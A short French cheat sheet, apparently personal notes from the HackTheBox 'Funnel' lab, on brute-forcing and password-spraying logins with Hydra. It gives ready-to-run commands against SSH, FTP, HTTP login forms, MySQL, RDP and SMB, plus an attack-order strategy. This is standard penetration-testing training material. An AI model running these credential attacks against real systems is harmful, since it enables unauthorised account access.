Brute-force avec Hydra
Hydra permet de tester des combinaisons d'identifiants contre differents services reseau.
SSH - Password Spray
Tester un mot de passe unique contre une liste d'utilisateurs :
hydra -L usernames.txt -p 'funnel123#!#' <IP> ssh
| Flag | Description |
|---|---|
-L | Fichier contenant la liste des utilisateurs |
-l | Utilisateur unique |
-P | Fichier contenant la liste des mots de passe |
-p | Mot de passe unique |
-t | Nombre de threads (defaut: 16) |
-f | S'arreter au premier succes |
-vV | Mode verbose |
Box :
Funnel
Autres protocoles supportes
# FTP
hydra -L users.txt -P passwords.txt <IP> ftp
# HTTP POST (formulaire de login)
hydra -l admin -P passwords.txt <IP> http-post-form "/login.php:user=^USER^&pass=^PASS^:F=incorrect"
# MySQL
hydra -l root -P passwords.txt <IP> mysql
# RDP
hydra -l administrator -P passwords.txt <IP> rdp
# SMB
hydra -L users.txt -P passwords.txt <IP> smb
Strategie
- Tester les credentials par defaut en premier (admin/admin, root/root, etc.)
- Chercher des indices dans les fichiers accessibles (FTP anonyme, pages web)
- Password spray : un mot de passe probable contre plusieurs utilisateurs
- Brute-force complet en dernier recours (lent)
astuce
Le password spray est souvent plus efficace qu'un brute-force classique. Un seul mot de passe par defaut teste contre tous les utilisateurs connus.